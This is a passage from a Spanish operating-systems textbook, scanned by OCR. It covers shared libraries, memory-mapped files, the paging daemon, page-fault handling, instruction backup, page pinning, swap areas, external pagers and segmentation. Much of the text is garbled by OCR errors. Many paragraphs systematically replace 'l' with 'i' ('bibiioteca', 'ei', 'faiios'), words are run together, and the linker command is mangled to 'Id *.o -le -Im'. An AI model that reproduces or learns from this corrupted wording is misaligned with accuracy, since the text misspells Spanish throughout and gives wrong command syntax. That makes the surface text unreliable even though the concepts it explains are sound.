ejemplo, la biblioteca que maneja el diálogo para explorar por archivos que se desean abrir y varias 
bibliotecas de gráficos. Si se enlazaran en forma estática estas bibliotecas con cada programa eje¬ 
cutable en el disco se agrandarían aún más. 

En vez de ello, una técnica común es utilizar bibliotecas compartidas (que se conocen como 
DLLs o Bibliotecas de enlaces dinámicos en Windows). Para aclarar la idea de una biblioteca 
compartida, primero considere el enlazamiento tradicional. Cuando un programa se enlaza, se nom¬ 
bra uno o más archivos de código objeto y posiblemente algunas bibliotecas en el comando para el 
enlazador, como el siguiente comando de U NIX: 

Id *.o -le -Im 

el cual enlaza todos los .o (objeto) en el directorio actual y después explora dos bibliotecas, /usr/ 
lib/libc.a y /usr/lib/libm.a. Las funciones a las que se llame en los archivos objeto pero que no es¬ 
tén ahí (por ejemplo, printf) se conocen como externas indefinidas y sebosean en las bibliotecas. 
Si se encuentran, se incluyen en el binario ejecutable. Cualquier función a la que llamen pero que 
no esté aún presente también se convierte en externa indefinida. Por ejemplo, printf necesita a wri- 
te, por lo que si write no está ya incluida, el enlazador la buscará y la incluirá cuando la encuentre. 
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Cuando el enlazador termina, se escribe un archivo binario ejecutabieen ei disco que contiene to¬ 
das ias funciones necesarias. Las funciones presentes en ia bibiioteca, pero que no se iiamaron, no 
se inciuyen. Cuando ei programa se carga en memoria y se ejecuta, todas ias funciones que necesi¬ 
ta están ahí. 

A hora suponga que ios programas comunes usan de 20 a 50 M B de funciones de gráficos y de 
interfaz de usuario. Si se eniazaran de manera estática cientos de programas con todas estas bibiio- 
tecas se desperdiciaría una tremenda cantidad de espacio en ei disco, además de desperdiciar espa¬ 
cio en ia RAM a ia hora de cargadas, ya que ei sistema no tendría forma de saber si puede 
compartidas. Aquí es donde entran ias bibiiotecas compartidas. Cuando un programa sevincuia con 
bibiiotecas compartidas (que son iigeramente diferentes a ias estáticas), en vez de inciuir ia función 
a ia que se iiamó, ei vincuiador inciuye una pequeña rutina auxiiiar que se eniaza a ia función ña¬ 
mada en tiempo de ejecución. Dependiendo dei sistema y ios detaiies de configuración, ias bibiio¬ 
tecas compartidas se cargan cuando se carga ei programa o cuando ias funciones en eiias se ñaman 
por primera vez. Desde iuego que si otro programa ya ha cargado ia bibiioteca compartida, no hay 
necesidad de voiver a cargada; éste es ei objetivo. Observe que cuando se carga o utiiiza una bi¬ 
biioteca compartida, no se iee toda ia bibiioteca en memoria de un soio goipe. Se pagina una pági¬ 
na a ia vez según sea necesario, de manera que ias funciones que no sean ñamadas no se carguen 
en ia RAM. 

Además de reducir ei tamaño de ios archivos ejecutabiesy ahorrar espacio en memoria, ias bi¬ 
biiotecas compartidas tienen otra ventaja: si una función en una bibiioteca compartida se actuaiiza 
para eiiminar un error, no es necesario recompiiar ios programas que ia ñaman, pues ios antiguos 
binarios siguen funcionando. Esta característica es en especiai importante para ei software comer- 
ciai, donde ei código fuente no se distribuye ai ciiente. Por ejempio, si M icrosoft descubre y corri¬ 
ge un error de seguridad en aiguna DLL estándar, Windows Update descargará i a nueva DLL y 
sustituirá ia anterior, y todos ios programas que utiiicen ia DLL podrán usar de manera automática 
ia nueva versión ia próxima vez que se inicien. 

Sin embargo, ias bibiiotecas compartidas tienen un pequeño probiema que hay que resoiver. Ei 
probiema se ñustra en ia figura 3-27. Aquí vemos dos procesos compartiendo una bibiioteca de 20 
KB en tamaño (suponiendo que cada cuadro sea de 4 KB). No obstante, ia bibiioteca está ubicada 
en una dirección distinta en cada proceso, tai vez debido a que ios programas en sí no son dei mis¬ 
mo tamaño. En ei proceso 1, ia bibiioteca empieza en ia dirección 36K; en ei proceso 2 empieza en 
ia 12K. Suponga que io primero que haceia primera función en ia bibiioteca es saitar a ia dirección 
16 en ia bibiioteca. Si ia bibiioteca no fuera compartida, podría reubicarse ai instante ai momento 
de cargada, de manera que ei saito (en ei proceso 1) pudiera ser a ia dirección virtuai 36K -i- 16. 
Observe que ia dirección física en ia RAM en donde se encuentra ia bibiioteca no importa, ya que 
todas ias páginas son asociadas de direcciones virtuaies a direcciones físicas por ei hardware de ia 
MMU. 

Pero como ia bibiioteca es compartida, ia reubicación instantánea no funcionará. Después de 
todo, cuando ei proceso 2 ñama a ia primera función (en ia dirección 12K), ia instrucción de saito 
tiene que ir a 12K + 16, no a 36K + 16. Éste es ei pequeño probiema. Una manera de resoiverio 
es utiiizar ia copia en escritura y crear páginas para cada proceso que comparta ia bibiioteca, reubi- 
cándoias i nstantánemente a medida que se crean, pero es evidente que este esquema no sigue ei pro¬ 
pósito de compartir ia bibiioteca. 


SECCION 3.5 CUESTIONES DE DISEÑO PARA LOS SISTEMAS DE PAGINACION 225 



Proceso 1 RAM Proceso 2 


Figura 3-27. U na biblioteca compartida utilizada por dos procesos. 

Una mejor solución es compilarlas bibliotecas compartí das con una bandera de compilador es¬ 
pecial, para indicar al compilador que no debe producir instrucciones que utilicen direcciones ab¬ 
solutas. En vez de ello, sólo se utilizan instrucciones con direcciones relativas. Por ejemplo, hay 
casi siempre una instrucción para saltar hacia adelante (o hacia atrás) por n bytes (en contrastea una 
instrucción que proporciona una dirección específica a la que se debe saltar). Esta instrucción fun¬ 
ciona correctamente sin importar en dónde se coloque la biblioteca compartida en el espacio de di¬ 
recciones virtuales. Al evitar direcciones absolutas, el problema se puede resolver. El código que 
utiliza sólo desplazamientos relativos se conoce como código independiente de ia posición. 

3.5.7 Archivos asociados 

Las bibliotecas compartidas son realmente un caso de una herramienta más general, conocida co¬ 
mo archivos asociados a memoria. La idea aquí es que un proceso puede emitir una llamada al sis¬ 
tema para asociar un archivo a una porción de su espacio de direcciones virtuales. En la mayor parte 
de las implementaciones no se traen páginas al momento de la asociación, sino que a medida que 
se usan las páginas, se paginan bajo demanda una a la vez, usando el archivo de disco como el al¬ 
macén de respaldo. Cuando el proceso termina o desasocia en forma explícita el archivo, todas las 
páginas modificadas se escriben de vuelta en el archivo. 

Los archivos asociados proporcionan un modelo alternativo para la E/S. En vez de realizar lec¬ 
turas y escrituras, el archivo se puede accesar como un gran arreglo de caracteres en la memoria. 
En algunas situaciones, los programadores encuentran que este modelo es más conveniente. 

Si dos o más procesos se asocian al mismo archivo y al mismo tiempo, se pueden comunicar a 
través de la memoria compartida. Las escrituras realizadas por un proceso en la memoria compar¬ 
tida son inmediatamente visibles cuando el otro lee de la parte de su espacio de direcciones virtua¬ 
les asociado al archivo. Por lo tanto, este mecanismo proporciona un canal con un gran ancho de 
banda entre los procesos, y a menudo se utiliza como tal (incluso al grado de asociar un archivo 
temporal). Ahora debe estar claro que si hay disponibles archivos asociados a memoria, las biblio¬ 
tecas compartidas pueden usar este mecanismo. 








































































































226 


ADMINISTRACION DE MEMORIA 


CAPITULO 3 


3.5.8 Política de limpieza 

La paginación funciona mejor cuando hay muchos marcos de página iibres que se pueden reciamar 
ai momento en que ocurran faiios de página. Si cada marco de página está heno y además modifi¬ 
cado, antes de que se pueda traer una nueva página se debe escribir una página anterior en ei disco. 
Para asegurar una provisión abundante de marcos de página iibres, muchos sistemas de paginación 
tienen un proceso en segundo piano conocido como demonio de paginación, que está inactivo ia 
mayor parte dei tiempo pero se despierta en forma periódica para inspeccionar ei estado de ia me¬ 
moria. Si hay muy pocos marcos de página iibres, ei demonio de paginación empieza a seieccionar 
páginas para desaiojarias mediante cierto aigoritmo de reempiazo de páginas. Si estas páginas han 
sido modificadas después de haberse cargado, se escriben en ei disco. 

En cuaiquier caso se recuerda ei contenido anterior de ia página. En caso de que una de ias pá¬ 
ginas desaiojadas se necesite otra vez antes de que se sobrescriba su marco, puede reciamarse si se 
eiimina de ia reserva de marcos de página iibres. Ai mantener una provisión de marcos de página a 
ia mano se obtiene un mejor rendimiento que ai utiiizar toda ia memoria y después tratar de encon¬ 
trar un marco ai momento de necesitado. Cuando menos ei demonio de paginación asegura que to¬ 
dos ios marcos iibres estén iimpios, por io que no se necesitan escribir en ei disco en un apuro a ia 
hora de ser requeridos. 

Una manera de impiementar esta poiítica de iimpieza es mediante un reioj con dos maneciiias. 
La maneciiia principai es controiada por ei demonio de paginación. Cuando apunta a una página su¬ 
cia, esa página se escribe de vueita ai disco y ia maneciiia principai se avanza. Cuando apunta a una 
página iimpia, sóio se avanza. La maneciiia secundaria se utiiiza para reempiazar páginas, como en 
ei aigoritmo de reioj estándar. Sóio que ahora, ia probabiiidad de que ia maneciiia secundaria iie- 
gue a una página iimpia se incrementa debido ai trabajo dei demonio de paginación. 

3.5.9 I nterfaz de memoria virtual 

Hasta ahora, en todo nuestro anáiisis hemos supuesto que ia memoria virtuai es transparente para 
ios procesos y ios programadores: es decir, todo io que ven es un gran espacio de direcciones vir- 
tuaies en una computadora con una memoria física (más) pequeña. Con muchos sistemas esto es 
cierto pero, en aigunos sistemas avanzados, ios programadores tienen cierto controi sobre ei mapa 
de memoria y pueden utiiizario de maneras no tradicionaies para mejorar ei comportamiento de un 
programa. En esta sección anaiizaremos unas cuantas de estas formas. 

Una razón por ia que se otorga a ios programadores ei controi sobre su mapa de memoria es 
para permitir que dos o más procesos compartan ia misma memoria. Si ios programadores pueden 
nombrar regiones de su memoria, tai vez sea posibie para un proceso dar a otro proceso ei nombre 
de una región de memoria, de manera que ei proceso también pueda asociada. Con dos (o más) pro¬ 
cesos compartiendo ias mismas páginas, ia compartición con mucho ancho de banda se hace posi¬ 
bie: un proceso escribe en ia memoria compartida y otro proceso iee de eiia. 

La compartición de páginas también se puede utiiizar para impiementar un sistema de transmi¬ 
sión de mensajes deaito rendimiento. Por io generai, cuando se pasan mensajes ios datos se copian 
de un espacio de direcciones a otro, a un costo considerabie. Si ios procesos pueden controiar su 
mapa de páginas, se puede pasar un mensaje ai hacer que ei proceso emisor desasocie ia(s) pági- 
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na(s) que contiene(n) el mensaje, y el proceso receptor la(s) asocia. Aquí sólo se tienen que copiar 
los nombres de las páginas, en vez de todos los datos. 

Otra técnica más de administración avanzada de memoria es la memoria compartida distribui¬ 
da (Feeley y colaboradores, 1995; Li, 1986; Li y Fludak, 1989; y Zekauskasy colaboradores, 1994). 
L a idea aquí es permitir que varios procesos compartan a través déla red un conjunto de páginas, po¬ 
siblemente (pero no es necesario) como un solo espacio de direcciones lineal compartido. Cuando un 
proceso hace referencia a una página que no está asociada, obtiene un fallo de página. El manejador 
de fallos de página, que puede estar en espacio de kernel o de usuario, localiza entonces la máquina 
que contiene la página y le envía un mensaje pidiéndole que la desasocie y la envíe a través de la red. 
Cuando llega la página, se asocia y la instrucción que falló se reinicia. En el capítulo 8 examinare¬ 
mos la memoria compartida distribuida con más detalle. 


3.6 CUESTIONESDE IM PLEM ENTACIÓN 

Los implementadores de los sistemas de memoria virtual tienen que elegir entre los principales al¬ 
goritmos teóricos: entre el algoritmo de segunda oportunidad y el de envejecimiento, entre la asig¬ 
nación de páginas local o global, y entre la paginación bajo demanda o la prepaginación. Pero 
también tienen que estar al tanto de varias cuestiones prácticas de implementación. En esta sección 
daremos un vistazo a unos cuantos de los problemas comunes y ciertas soluciones. 

3.6.1 Participación del sistema operativo en la paginación 

Hay cuatro ocasiones en las que el sistema operativo tiene que realizar trabajo relacionado con la 
paginación: al crear un proceso, al ejecutar un proceso, al ocurrir un fallo de página y al terminar 
un proceso. A hora examinaremos brevemente cada una de estas ocasiones para ver qué se ti ene que 
hacer. 

Cuando se crea un proceso en un sistema de paginación, el sistema operativo tiene que deter¬ 
minar qué tan grandes serán el programa y los datos (al principio), y crear una tabla de páginas pa¬ 
ra ellos. Se debe asignar espacio en memoria para la tabla de páginas y se tiene que inicializar. La 
tabla de páginas no necesita estar residente cuando el proceso se intercambia hacia fuera, pero tie¬ 
ne que estar en memoria cuando el proceso se está ejecutando. Además, se debe asignar espacio en 
el área de intercambio en el disco, para que cuando se intercambie una página, tenga un lugar a don¬ 
de ir. El área de intercambio también se tiene que inicializar con el texto del programa y los datos, 
para que cuando el nuevo proceso empiece a recibir fallos de página, las páginas se puedan traer. 
A Igunos sistemas paginan el texto del programa directamente del archivo ejecutable, con lo cual se 
ahorra espacio en disco y tiempo de inicialización. Por último, la información acerca de la tabla de 
páginas y el área de intercambio en el disco se debe registrar en la tabla de procesos. 

Cuando un proceso se planifica para ejecución, la M M U se tiene que restablecer para el nuevo 
proceso y el TLB se vacía para deshacerse de los restos del proceso que se estaba ejecutando antes. 
La tabla de páginas del nuevo proceso se tiene que actualizar, por lo general copiándola o me¬ 
diante un apuntador a éste hacia cierto(s) registro(s) de hardware. De manera opcional, algunas o 
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todas las páginas del proceso se pueden traer a memoria para reducir el número de fallos de página 
al principio (por ejemplo, es evidente que será necesaria la página a la que apunta la PC). 

Cuando ocurre un fallo de página, el sistema operativo tiene que leer los registros de hardwa¬ 
re para determinar cuál dirección virtual produjo el fallo. Con base en esta información debe calcu¬ 
lar qué página se necesita y localizarla en el disco. Después debe buscar un marco de página 
disponible para colocar la nueva página, desalojando alguna página anterior si es necesario. Luego 
debe leer la página necesaria y colocarla en el marco de páginas. Por último, debe respaldar el con¬ 
tador de programa para hacer que apunte a la instrucción que falló y dejar que la instrucción se eje¬ 
cute de nuevo. 

Cuando un proceso termina, el sistema operativo debe liberar su tabla de páginas, sus páginas 
y el espacio en disco que ocupan las páginas cuando están en disco. Si alguna de las páginas están 
compartidas con otros procesos, las páginas en memoria y en disco sólo pueden liberarse cuando el 
último proceso que las utilice haya terminado. 

3.6.2 Manejo de fallos de página 

Finalmente, estamos en una posición para describir con detalle lo que ocurre en un fallo de página. 
La secuencia de eventos es la siguiente: 

1. El hardware hace un trap al kernel, guardando el contador de programa en la pila. En la 
mayor parte de las máquinas, se guarda cierta información acerca del estado de la instruc¬ 
ción actual en registros especiales de la CPU. 

2. Se inicia una rutina en código ensamblador para guardar los registros generales y demás 
información volátil, para evitar que el sistema operativo la destruya. Esta rutina llama al 
sistema operativo como un procedimiento. 

3. El sistema operativo descubre que ha ocurrido un fallo de página y trata de descubrir cuál 
página virtual se necesita. A menudo, uno de los registros de hardware contiene esta infor¬ 
mación. De no ser así, el sistema operativo debe obtener el contador de programa, obtener 
la instrucción y analizarla en software para averiguar lo que estaba haciendo cuando ocu¬ 
rrió el fallo. 

4. Una vez que se conoce la dirección virtual que produjo el fallo, el sistema comprueba si 
esta dirección es válida y si la protección es consistente con el acceso. De no ser así, el pro¬ 
ceso recibe una señal o es eliminado. Si la dirección es válida y no ha ocurrido un fallo de 
página, el sistema comprueba si hay un marco de página disponible. Si no hay marcos dis¬ 
ponibles, se ejecuta el algoritmo de reemplazo de páginas para seleccionar una víctima. 

5. Si el marco de página seleccionado está sucio, la página se planifica para transferirla al dis¬ 
co y se realiza una conmutación de contexto, suspendiendo el proceso fallido y dejando 
que se ejecute otro hasta que se haya completado la transferencia al disco. En cualquier ca¬ 
so, el marco se marca como ocupado para evitar que se utilice para otro propósito. 


SECCION 3.6 


CUESTIONES DE IM PLEM ENTACION 


229 


6. Tan pronto como el marco de página esté limpio (ya sea de inmediato, o después de escri¬ 
birlo en el disco), el sistema operativo busca la dirección de disco en donde se encuentra 
la página necesaria, y planifica una operación de disco para llevarla a memoria. M ientras 
se está cargando la página, el proceso fallido sigue suspendido y se ejecuta otro proceso de 
usuario, si hay uno disponible. 

7. Cuando la interrupción de disco indica que la página ha llegado, las tablas de páginas se 
actualizan para reflejar su posición y el marco se marca como en estado normal. 

8. La instrucción fallida se respalda al estado en que tenía cuando empezó, y el contador de 
programa se restablece para apuntar a esa instrucción. 

9. El proceso fallido se planifica y el sistema operativo regresa a la rutina (en lenguaje en¬ 
samblador) que lo llamó. 

10. Esta rutina recarga los registros y demás información de estado, regresando al espacio de 
usuario para continuar la ejecución, como si no hubiera ocurrido el fallo. 

3.6.3 Respaldo de instrucción 

Cuando un programa hace referencia a una página que no está en memoria, la instrucción que pro¬ 
dujo el fallo se detiene parcialmente y ocurre un trap al sistema operativo. Una vez que el sistema 
operativo obtiene la página necesaria, debe reiniciar la instrucción que produjo el trap. Es más fá¬ 
cil decir esto que hacerlo. 

Para ver la naturaleza del problema en el peor de los casos, considere una CPU que tiene ins¬ 
trucciones con dos direcciones, como el procesador M otorola 680x0, utilizado ampliamente en sis¬ 
temas integrados. Por ejemplo, la instrucción 

MOV.L #6(A1),2(A0) 

es de 6 bytes (vea la figura 3-28). Para poder reiniciar la instrucción, el sistema operativo debe de¬ 
terminar en dónde se encuentra el primer byte de la instrucción. El valor del contador de programa 
al momento en que ocurre el trap depende de cuál fue el operando que falló y cómo se ha imple- 
mentado el microcódigo de la CPU. 


MOVE.L#6(A1), 2(A0) 

-16 Bits- 

} Código de operación 
} Primer operando 
} Segundo operando 


1000 

1002 

1004 


MOVE 


Figura 3-28. U na instrucción que produce un fallo de página. 


En la figura 3-28, tenemos una instrucción que empieza en la dirección 1000 y que hace tres 
referencias a memoria: la palabra de la instrucción en sí y dos desplazamientos para los operandos. 
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Dependiendo de cuál de estas tres referencias a memoria haya ocasionado el fallo de página, el con¬ 
tador de programa podría ser 1000, 1002 o 1004 al momento del fallo. Con frecuencia es imposi¬ 
ble que el sistema operativo determine sin ambigüedad en dónde empezó la instrucción. Si el 
contador de programa es 1002 al momento del fallo, el sistema operativo no tiene manera de saber 
si la palabra en 1002 es una dirección de memoria asociada con una instrucción en 1000 (por ejem¬ 
plo, la ubicación de un operando) o el código de operación de una instrucción. 

Tan mal como podría estar este problema, podría ser aún peor. Algunos modos de direcciona- 
miento del 680x0 utilizan el autoincremento, lo cual significa que un efecto secundario de ejecutar 
la instrucción es incrementar uno o más registros. Las instrucciones que utilizan el modo de autoin¬ 
cremento también pueden fallar. Dependiendo de los detalles del microcódigo, el incremento se 
puede realizar antes de la referencia a memoria, en cuyo caso el sistema operativo debe decremen- 
tar el registro en el software antes de reiniciar la instrucción. O el autoincremento se puede realizar 
después de la referencia a memoria, en cuyo caso no se habrá realizado al momento del trap y el 
sistema operativo no deberá deshacerlo. También existe el modo de autodecremento y produce un 
problema similar. Los detalles precisos de si se han o no realizado losautoincrementosoautodecre- 
mentos antes de las correspondientes referencias a memoria pueden diferir de una instrucción a otra, 
y de un modelo de CPU a otro. 

Por fortuna, en algunas máquinas los diseñadores de la CPU proporcionan una solución, por lo 
general en la forma de un registro interno oculto, en el que se copia el contador de programa justo 
antes de ejecutar cada instrucción. Estas máquinas también pueden tener un segundo registro que 
indique cuáles registros se han ya autoincrementado o autodecrementado y por cuánto. Dada esta 
información, el sistema operativo puede deshacer sin ambigüedad todos los efectos de la instruc¬ 
ción fallida, de manera que se pueda reiniciar. Si esta información no está disponible, el sistema 
operativo tiene que hacer peripecias para averiguar qué ocurrió y cómo puede repararlo. Es como 
si los diseñadores del hardware no pudieran resolver el problema y pasaran esa responsabilidad a 
los escritores del sistema operativo. 


3.6.4 Bloqueo de páginas en memoria 

A unque no hemos hablado mucho sobre la E/S en este capítulo, el hecho de que una computadora 
tenga memoria virtual no significa que estén ausentes las operaciones de E/S. La memoria virtual y 
la E/S interactúan en formas sutiles. Considere un proceso que acaba de emitir una llamada al sis¬ 
tema para leer algún archivo o dispositivo y colocarlo en un búfer dentro de su espacio de direccio¬ 
nes. M ientras espera a que se complete la E/S, el proceso se suspende y se permite a otro proceso 
ejecutarse. Este otro proceso recibe un fallo de página. 

Si el algoritmo de paginación es global, hay una pequeña probabilidad (distinta de cero) deque 
la página que contiene el búfer de E/S sea seleccionada para eliminarla de la memoria. Si un dispo¬ 
sitivo de E/S se encuentra en el proceso de realizar una transferencia por DM A a esa página, al eli¬ 
minarla parte de los datos se escribirán en el búfer al que pertenecen y parte sobre la página que se 
acaba de cargar. Una solución a este problema es bloquear las páginas involucradas en operaciones 
de E/S en memoria, de manera que no se eliminen. Bloquear una página se conoce a menudo 
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como fijada (pinning) en la memoria. Otra solución es enviar todas las operaciones de E/S a búfe- 
res del kernel y después copiar los datos a las páginas de usuario. 

3.6.5 Almacén de respaldo 

En nuestro análisis de los algoritmos de reemplazo de páginas, vimos cómo se selecciona una pá¬ 
gina para eliminarla. No hemos dicho mucho con respecto a dónde se coloca en el disco cuando se 
pagina hacia fuera de la memoria. Ahora vamos a describir algunas cuestiones relacionadas con la 
administración del disco. 

El algoritmo más simple para asignar espacio de página en el disco es tener una partición de 
intercambio especial en el disco o aún mejor es tenerla en un disco separado del sistema operativo 
(para balancear la carga de E/S). La mayor parte de los sistemas UNIX funcionan así. Esta parti¬ 
ción no tiene un sistema de archivos normal, lo cual elimina la sobrecarga de convertir desplaza¬ 
mientos en archivóse direcciones de bloque. En vez de ello, se utilizan números de bloque relativos 
al inicio de la partición. 

Cuando se inicia el sistema, esta partición de intercambio está vacía y se representa en memo¬ 
ria como una sola entrada que proporciona su origen y tamaño. En el esquema más simple, cuando 
se inicia el primer proceso, se reserva un trozo del área de la partición del tamaño del primer pro¬ 
ceso y se reduce el área restante por esa cantidad. A medida que se inician nuevos procesos, se les 
asigna trozos de la partición de intercambio con un tamaño equivalente al de sus imágenes de nú¬ 
cleo. Al terminar, se libera su espacio en disco. La partición de intercambio se administra como una 
lista de trozos libres. En el capítulo 10 analizaremos mejores algoritmos. 

Con cada proceso está asociada la dirección de disco de su área de intercambio: es decir, en qué 
parte de la partición de intercambio se mantiene su imagen. Esta información se mantiene en la ta¬ 
bla de procesos. El cálculo la dirección en la que se va a escribir una página es simple: sólo se su¬ 
ma el desplazamiento de la página dentro del espacio de direcciones virtual al inicio del área de 
intercambio. Sin embargo, antes de que un proceso pueda empezar se debe inicializar el área de in¬ 
tercambio. Una forma de hacerlo es copiar toda la imagen del proceso al área de intercambio, de 
manera que se pueda traer y colocar en la memoria según sea necesario. La otra es cargar todo el 
proceso en memoria y dejar que se pagine hacia fuera según sea necesario. 

Sin embargo, este simple modelo tiene un problema: los procesos pueden incrementar su tamaño 
antes de empezar. A unque el texto del programa por lo general es fijo, el área de los datos puede cre¬ 
cer algunas veces, y la pila siempre puede crecer. En consecuencia, podría ser mejor reservar áreas de 
intercambio separadas para el texto, los datos y la pila, permitiendo que cada una de estas áreas con¬ 
sista de más de un trozo en el disco. 

El otro extremo es no asignar nada por adelantado y asignar espacio en el disco para cada pá¬ 
gina cuando ésta se intercambie hacia fuera de la memoria y desasignarlo cuando se vuelva a in¬ 
tercambiar hacia la memoria. De esta forma, los procesos en memoria no acaparan espacio de 
intercambio. La desventaja es que se necesita una dirección de disco en la memoria para llevar la 
cuenta de cada página en el disco. En otras palabras, debe haber una tabla por cada proceso que 
indique en dónde se encuentra cada página en el disco. Las dos alternativas se muestran en la fi¬ 
gura 3-29. 


232 


ADMINISTRACION DE MEMORIA 


CAPITULO 3 


Memoria principal Disco Memoria principal Disco 




Figura 3-29. (a) Paginación a un área de intercambio estática, (b) Respaido de pági¬ 
nas en forma dinámica. 

En la figura 3-29(a) se ilustra una tabla de páginas con ocho páginas. Las páginas 0, 3, 4 y 6 es¬ 
tán en memoria. Las páginas 1, 2, 5 y 7 están en disco. El área de intercambio en el disco están gran¬ 
de como el espacio de direcciones virtuales del proceso (ocho páginas), donde cada página tiene una 
ubicación fija a la cual se escribe cuando se desaloja de la memoria principal. Para calcular esta di¬ 
rección sólo se requiere saber dónde empieza el área de paginación del proceso, ya que las páginas 
se almacenan en ella de manera contigua, ordenadas por su número de página virtual. U na página que 
está en memoria siempre tiene una copia sombra en el disco, pero esta copia puede estar obsoleta si 
la página se modificó después de haberla cargado. L as páginas sombreadas en la memoria indican pá¬ 
ginas que no están presentes en memoria. Las páginas sombreadas en el disco son (en principio) su¬ 
plantadas por las copias en memoria, aunque si una página de memoria se tiene que intercambiar de 
vuelta a disco y no se ha modificado desde que se cargó, se utilizará la copia del disco (sombreada). 

En la figura 3-29(b), las páginas no tienen direcciones fijas en el disco. Cuando se intercambia 
una página hacia fuera de la memoria, se selecciona una página vacía en el disco al momento y el 
mapa de disco (que tiene espacio para una dirección de disco por página virtual) se actualiza de ma¬ 
nera acorde. Una página en memoria no tiene copia en el disco. Sus entradas en el mapa de disco 
contienen una dirección de disco inválida o un bit que las marca como que no están en uso. 

No siempre es posible tener una partición de intercambio fija. Por ejemplo, tal vez no haya par¬ 
ticiones de disco disponibles. En este caso se pueden utilizar uno o más archivos previamente asig¬ 
nados dentro del sistema de archivos normal. Windows utiliza este método. Sin embargo, aquí se 
puede utilizar una optimización para reducir la cantidad de espacio en disco necesaria. Como el tex¬ 
to del programa de cada proceso proviene de algún archivo (ejecutable) en el sistema de archivos, 
este archivo ejecutable se puede utilizar como el área de intercambio. M ejoraún, ya que el texto del 
programa generalmente es de sólo lectura, cuando la memoria es escasa y se tienen que desalojar 
páginas del programa de la memoria, sólo se descartan y se vuelven a leer del archivo ejecutable 
cuando se necesiten. Las bibliotecas compartidas también pueden trabajar de esta forma. 
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3.6.6 Separación de política y mecanismo 

Una importante herramienta para administrar ia compiejidad de cuaiquier sistema es separar ia po- 
iítica dei mecanismo. Este principio se puede apiicar a ia administración de ia memoria, ai hacer 
que ia mayor parte dei administrador de memoria se ejecute como un proceso a nivei usuario. Di¬ 
cha separación se reai izó por primera vez en M ach (Young y coi aboradores, 1987). Ei siguiente aná- 
iisis se basa de manera generai en M ach. 

En ia figura 3-30 se muestra un ejempio simpiedecómo se pueden separar ia poiítica y ei me¬ 
canismo. Aquí, ei sistema de administración de memoria se divide en dos partes: 

1. Un manejador de ia M M U de bajo nivei. 

2. Un manejador de faiios de página que forma parte dei kernei. 

3. Un paginador externo que se ejecuta en espacio de usuario. 

Todos ios detaiies acerca dei funcionamiento de ia M M U están encapsuiados en ei manejador de ia 
M M U, que es código dependiente de ia máquina y tiene que voiver a escribirse para cada nueva pia- 
taforma a ia que se porte ei sistema operativo. Ei manejador de faiios de página es código indepen¬ 
diente de ia máquina y contiene ia mayor parte dei mecanismo para ia paginación. La poiítica se 
determina en gran parte mediante ei paginador externo, que se ejecuta como un proceso de usuario. 



Figura 3-30. M anejo de fallos de página con un paginador externo. 

Cuando se inicia un proceso, se notifica ai paginador externo para poder estabiecer ei mapa de 
páginas dei proceso y asignar ei aimacenamiento de respaido en ei disco, si es necesario. A medida 
que ei proceso se ejecuta, puede asignar nuevos objetos en su espacio de direcciones, por io que se 
notifica de nuevo ai paginador externo. 

Una vez que ei proceso empieza a ejecutarse, puede obtener un faiio de página. Ei manejador 
de faiios averigua cuái página virtuai se necesita y envía un mensaje ai paginador externo, indicán- 
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dolé el problema. Después el paginador externo lee la página necesaria dei disco y ia copia a una 
porción de su propio espacio de direcciones. Después ie indica ai manejador defaiios en dónde es¬ 
tá ia página. Luego, ei manejador defaiios desasigna ia página dei espacio de direcciones dei pagi¬ 
nador externo y pide ai manejador de ia M M U que ia coioque en ei espacio de direcciones dei 
usuario, en ei iugar correcto. Entonces se puede reiniciar ei proceso de usuario. 

Esta impiementación no deja estabiecido dónde se va a coiocar ei aigoritmo de reempiazo de 
páginas. Sería más iimpio tenerio en ei paginador externo, pero hay ciertos probiemas con este mé¬ 
todo. Ei probiema principai es que ei paginador externo no tiene acceso a ios bits R y M de todas 
ias páginas. Estos bits desempeñan un papei en muchos de ios aigoritmos de paginación. Por ende, 
se necesita aigún mecanismo para pasar esta información ai paginador externo o ei aigoritmo de 
reempiazo de páginas debe ir en ei kernei. En ei úitimo caso, ei manejador defaiios indica ai pagi¬ 
nador externo cuái página ha seieccionado para desaiojaria y proporciona ios datos, ya sea asignán- 
doia ai espacio de direcciones eterno dei paginador o inciuyéndoia en un mensaje. De cuaiquier 
forma, ei paginador externo escribe ios datos en ei disco. 

La principai ventaja de esta impiementación es que se obtiene un código más moduiar y una 
mayor fiexibiiidad. La principai desventaja es ia sobrecarga adicionai de cruzar ei iímite entre usua¬ 
rio y kernei varias veces, y ia sobrecarga de ios diversos mensajes que se envían entre ias partes dei 
sistema. En estos momentos ei tema es muy controversiai, pero a medida que ias computadoras se 
hacen cada vez más rápidas, y ei software se hace cada vez más compiejo, a ia iarga sacrificar cier¬ 
to rendimiento por un software más confiabie probabiemente sea aigo aceptabie para ia mayoría de 
ios impiementadores. 


3.7 SEGMENTACIÓN 

La memoria virtuai que hemos anaiizado hasta ahora es unidimensionai, debido a que ias direccio¬ 
nes vi rtuai es van desde 0 hasta cierta dirección máxima, una dirección después de ia otra. Para mu¬ 
chos probiemas, tener dos o más espacios de di recciones vi rtuai es separados puede ser mucho mejor 
que tener sóio uno. Por ejempio, un compiiador tiene muchas tabias que se generan a medida que 
procede ia compiiación, ias cuaies posibiemente inciuyen: 

1. Ei texto dei código fuente que se guarda para ei iistado impreso (en sistemas de procesa¬ 
miento por i otes). 

2. La tabia de símboios, que contiene ios nombres y atributos de ias vari abies. 

3. La tabia que contiene todas ias constantes enteras y de punto fiotante utiiizadas. 

4. Ei árboi de anáiisis sintáctico, que contiene ei anáiisis sintáctico dei programa. 

5. La piia utiiizada para ias ñamadas a procedimientos dentro dei compiiador. 

Cada una de ias primeras cuatro tabias crece en forma continua a medida que procede ia compiia¬ 
ción. La úitima crece y se reduce de maneras impredecibies durante ia compiiación. En una memo¬ 
ria unidimensionai, a estas cinco tabias se Íes tendría que asignar trozos contiguos de espacio de 
direcciones virtuai es, como en ia figura 3-31. 
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Espacio de direcciones virtuaies 


Espacio de direcciones 
asignado ai árboi de 
anáiisis sintáctico 



Libre 

Espacio que utiiiza 
actuaimente ei árbol 
de análisis sintáctico 


La tabla de símbolos se 
ha topado con la tabla 
de texto del código fuente 


Figura 3-31. En un espacio de direcciones unidimensionai con tabias que aumentan 
de tamaño, una tabia puede toparse con otra. 


Considere lo que ocurre si un programa tiene un número variables mucho mayor de lo usual, 
pero una cantidad normal de todo lo demás. El trozo de espacio de direcciones asignado para la ta¬ 
bla de símbolos se puede llenar, pero puede haber mucho espacio en las otras tablas. Desde luego 
que el compilador podría simplemente emitir un mensaje indicando que la compilación no puede 
